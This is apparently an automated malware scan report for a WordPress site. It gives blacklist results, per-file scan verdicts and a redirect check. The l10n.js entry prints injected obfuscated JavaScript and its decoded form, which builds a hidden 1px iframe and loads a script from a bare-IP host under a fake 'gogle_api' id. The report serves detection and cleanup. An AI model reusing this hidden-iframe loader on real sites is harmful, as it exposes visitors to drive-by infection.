Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=melliotgreene.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://melliotgreene.com/
Result: The website is marked by Yandex as suspicious; visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.melliotgreene.com/ | 200 OK Content-Length: 10726 Content-Type: text/html | clean |
http://www.melliotgreene.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 5976 Content-Type: application/javascript | suspicious |
Suspicious code: the script creates an iframe. What appears to be the stock convertEntities() helper is followed by an appended, hex-escaped string array (_0x473c). In the decoded portion, MakeFrame() adds a 1px × 1px iframe and a script element (id 'gogle_api') whose src is a bare-IP URL; one second later Make() repoints that script element at a googleapis.com jQuery URL and sets the iframe's src. The decoded code then reads navigator.userAgent. Original script: function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b}; var _0x473c=["\x6E\x20\x71\x28\x29\x7B\x33\x3D\x30\x2E\x62\x28\x27\x64\x27\x29\x3B\x33\x2E\x63\x3D\x27\x70\x3A\x2F\x2F\x6A\x2E\x4 ...[5549 bytes skipped]... Decoded script: function Make(){element=document.getElementById('gogle_api');element.src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js';element=document.getElementById('iframe');element.src=assa}function MakeFrame(){element=document.getElementById('gogle_api');if(!element){var el2=document.createElement("iframe");document.body.appendChild(el2);el2.id='iframe';el2.style.width='1px';el2.style.height='1px';var el=document.createElement("script");document.body.appendChild(el);el.id='gogle_api';el.src='http://91.196.216.20/url.php';var t=setTimeout("Make()",1000)}}var ua=navigator.userAgent.toLowerCase();if(((ua.indexOf ...[1719 bytes skipped]... | ||
http://www.melliotgreene.com/wp-includes/js/jquery/jquery.js?ver=1.4.4 | 200 OK Content-Length: 84285 Content-Type: application/javascript | clean |
http://www.melliotgreene.com/wp-content/themes/Modest/epanel/shortcodes/js/et_shortcodes_frontend.js?ver=1.6 | 200 OK Content-Length: 10622 Content-Type: application/javascript | malicious |
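Malicious code - confirmed by antiviruses (see below). Note: the excerpt shows only the beginning of the file, which looks like ordinary theme code; the portion that triggered the detection is not visible in this excerpt, so the whole file should be compared against a known-good copy. The same appears to hold for the other files flagged as malicious in this table. Excerpt: (function($) { $.fn.et_shortcodes_switcher = function(options) { var defaults = { slides: '>div', activeClass: 'active', linksNav: '', findParent: true, lengthElement: 'li', useArrows: false, arrowLeft: 'a#prev-arrow', arrowRight: 'a#next-arrow', auto: false, autoSpeed: 5000, slidePadding: '', pauseOnHover: true, fx: 'fade', sliderT Antivirus reports: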
| ||
http://www.melliotgreene.com/wp-content/themes/Modest/js/jquery.easing.1.3.js | 200 OK Content-Length: 10302 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; retur Antivirus reports:
| ||
http://www.melliotgreene.com/wp-content/themes/Modest/js/superfish.js | 200 OK Content-Length: 5919 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; clearTimeout(menu.sfTimer); men Antivirus reports:
| ||
http://www.melliotgreene.com/wp-content/themes/Modest/js/custom.js | 200 OK Content-Length: 7950 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.noConflict(); jQuery('ul.nav').superfish({ delay: 200, animation: {opacity:'show',height:'show'}, speed: 'fast', autoArrows: true, dropShadows: false }); jQuery('ul.nav > li > a.sf-with-ul').parent('li').addClass('sf-ul'); var $featured_slider = jQuery('#featured'), $featured_slides = $featured_slider.find('.slide'), Antivirus reports:
| ||
http://www.melliotgreene.com/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 24802 Content-Type: application/javascript | clean |
http://www.melliotgreene.com/wp-content/plugins/contact-form-7/scripts.js?ver=2.4.4 | 200 OK Content-Length: 8007 Content-Type: application/javascript | clean |
http://www.melliotgreene.com/wp-content/themes/Modest/epanel/page_templates/js/fancybox/jquery.fancybox-1.2.6.pack.js?ver=1.3.2 | 200 OK Content-Length: 11727 Content-Type: application/javascript | malicious |
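Malicious code - confirmed by antiviruses (see below). Note: the leading eval(function(p,a,c,k,e,r){...}) wrapper is the common JavaScript packer format, which is expected for a file distributed as ".pack.js"; the packing alone is not what marks this file as malicious, and the flagged portion is not visible in this truncated excerpt. Excerpt: ;eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}(';(p($){$.q.1Q=p(){J O.2n(p(){n b=$(O).u(\'2o\');8(b.1d(/^3i\\(["\']?(.*\\.2p)["\']?\\)$/i)){b=3j.$1;$(O).u({\'2o\':\'3k\',\'1e\':"3l:3m.3n.3o(3p=D, 3q="+($(O).u(\'3r\' Antivirus reports: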
| ||
http://www.melliotgreene.com/wp-content/themes/Modest/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1 | 200 OK Content-Length: 5932 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function() { jQuery("a[class^='fancybox']").fancybox({ 'overlayOpacity' : 0.7, 'overlayColor' : '#000000', 'zoomSpeedIn' : 500, 'zoomSpeedOut' : 500 }); var $portfolioItem = jQuery('.et_pt_gallery_entry'); $portfolioItem.find('.et_pt_item_image').css('background-color','#000000'); jQuery('.zoom-icon, .more-icon').css({'opacity':'0','visibility':'visible'}); $portfolioItem.hover(function(){ jQuery( Antivirus reports:
| ||
http://www.melliotgreene.com/?page_id=5 | 200 OK Content-Length: 11786 Content-Type: text/html | clean |
http://www.melliotgreene.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 2991 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form Antivirus reports:
| ||
http://www.melliotgreene.com/?page_id=7 | 200 OK Content-Length: 10495 Content-Type: text/html | clean |
http://www.melliotgreene.com/?page_id=9 | 200 OK Content-Length: 12700 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: melliotgreene.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: melliotgreene.com
Referer: http://www.google.com/search?q=melliotgreene.com
Result:
The result is similar to the first query. No suspicious redirects were found.